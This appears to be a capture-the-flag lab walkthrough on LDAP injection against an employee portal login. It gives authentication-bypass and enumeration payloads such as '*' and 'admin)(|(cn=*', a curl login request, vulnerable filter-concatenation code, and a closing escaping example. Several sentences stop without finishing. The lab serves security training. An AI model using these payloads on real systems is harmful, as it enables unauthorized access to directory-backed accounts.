A corporate employee portal relies on LDAP directory services for secure authentication, implementing enterprise-grade access controls. But when user input meets insufficient query sanitization, even the most trusted directory systems can become gateways to unauthorized access. 🎯 Time to test your directory injection skills against real-world authentication mechanisms!
LDAP injection occurs when user input is directly concatenated into LDAP search filters without proper sanitization. LDAP uses a specific filter syntax with operators like `&` (AND), `|` (OR), and `!` (NOT), along with wildcards like `*`.
A typical authentication filter, and the same filter as the application builds it from user input:

```text
(&(cn=username)(userPassword=password))
(&(cn={user_input})(userPassword={password_input}))
```
Navigate to
Test these credentials to understand normal application behavior and observe the user dashboard functionality.
The application constructs LDAP filters by directly concatenating user input:
```python
# Vulnerable code pattern
ldap_filter = f"(&(cn={username})(userPassword={password}))"
```
This construction allows attackers to manipulate the filter logic by injecting LDAP operators and wildcards.
Start with simple injection attempts to understand the application's behavior:
```text
# Try wildcard in username field
Username: *
Password: anything
# This attempts to match any user

# Try closing the filter early
Username: *)(
Password: anything
# This attempts to break filter logic
```
The most effective LDAP injection payload uses a wildcard to bypass authentication: `*`

How this works:

```text
(&(cn=*)(userPassword=anything))
```

`*` matches any username in the directory.

```text
# OR injection attempt
Username: admin)(|(cn=*
Password: anything
# Resulting filter:
# (&(cn=admin)(|(cn=*)(userPassword=anything))

# Early filter termination
Username: *)(*
Password: anything
# Attempts to close and reopen filter
```
When the wildcard injection succeeds, the application may return an administrative user account. Look for users in the IT department who have elevated privileges:
Once you successfully bypass authentication and gain administrative access:
The vulnerability exists because:
```python
# Vulnerable Flask code
ldap_filter = f"(&(cn={username})(userPassword={password}))"
# When username = "*"
# The filter becomes:
# (&(cn=*)(userPassword=anything))
# The wildcard matches any user, bypassing authentication
```

```text
# Enumerate user attributes
Username: *)(mail=*
Password: anything
# Attempts to find users with email

# Target specific departments
Username: *)(department=IT
Password: anything
# Specifically targets IT users

# Boolean-based enumeration
Username: *)(cn=a*
Password: anything
# Tests for users starting with 'a'
```
Use `*` as username:

```bash
# POST login request
curl -X POST /login \
  -d "username=*&password=test" \
  -L
# Look for flag in response HTML
```
| Operator | Description | Example |
|---|---|---|
| `&` | AND operation | `(&(cn=user)(mail=*))` |
| `\|` | OR operation | `(\|(cn=admin)(cn=root))` |
| `!` | NOT operation | `(!(department=Sales))` |
| `*` | Wildcard | `(cn=*)` |
| `=` | Equality | `(cn=john)` |
| `~=` | Approximate | `(cn~=jon)` |
LDAP injection vulnerabilities can lead to:
To prevent LDAP injection vulnerabilities:
The special characters `*`, `(`, `)`, `&`, `|`, `\`, `/`, NUL and other control characters should be properly escaped or filtered from user input.
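As an added example (not the lab's own code), the escaping the prevention advice above calls for, implemented per RFC 4515 section 3: the page's vulnerable concatenation is kept beside a hardened builder so the two filters can be compared, and a small check reports raw filter metacharacters in user input so the application can log a probable injection attempt. The function names are assumptions of this example.

```python
# Added example: RFC 4515 value escaping for LDAP search filters.
# Function names (escape_filter_value, build_auth_filter, ...) are assumptions.
from typing import Dict, Set

# Characters RFC 4515 requires to be escaped inside an assertion value.
# '&' and '|' need no escaping: they are operators only directly after an
# unescaped '(' and become plain text once the parentheses are escaped.
_ESCAPES: Dict[str, str] = {
    "\\": r"\5c",   # the escape character itself
    "*": r"\2a",    # wildcard
    "(": r"\28",    # filter open
    ")": r"\29",    # filter close
    "\x00": r"\00", # NUL
}


def escape_filter_value(value: str) -> str:
    """Return value so that it matches literally inside an LDAP filter."""
    # Per-character mapping, so backslashes produced by one replacement
    # are never re-escaped by a later one.
    return "".join(_ESCAPES.get(ch, ch) for ch in value)


def vulnerable_filter(username: str, password: str) -> str:
    """The concatenation pattern the lab demonstrates (kept for comparison)."""
    return f"(&(cn={username})(userPassword={password}))"


def build_auth_filter(username: str, password: str) -> str:
    """Hardened form: every user-controlled value is escaped before insertion."""
    return (f"(&(cn={escape_filter_value(username)})"
            f"(userPassword={escape_filter_value(password)}))")


def suspicious_metachars(value: str) -> Set[str]:
    """Raw filter metacharacters present in user input; a non-empty result
    is worth logging at the login boundary as a probable injection attempt."""
    return {ch for ch in value if ch in _ESCAPES}


if __name__ == "__main__":
    # Constructed sample inputs: a normal user and two payloads from this page.
    for user in ["alice", "*", "admin)(|(cn=*"]:
        print(vulnerable_filter(user, "x"), "->", build_auth_filter(user, "x"))
        print("  flagged:", sorted(suspicious_metachars(user)))
```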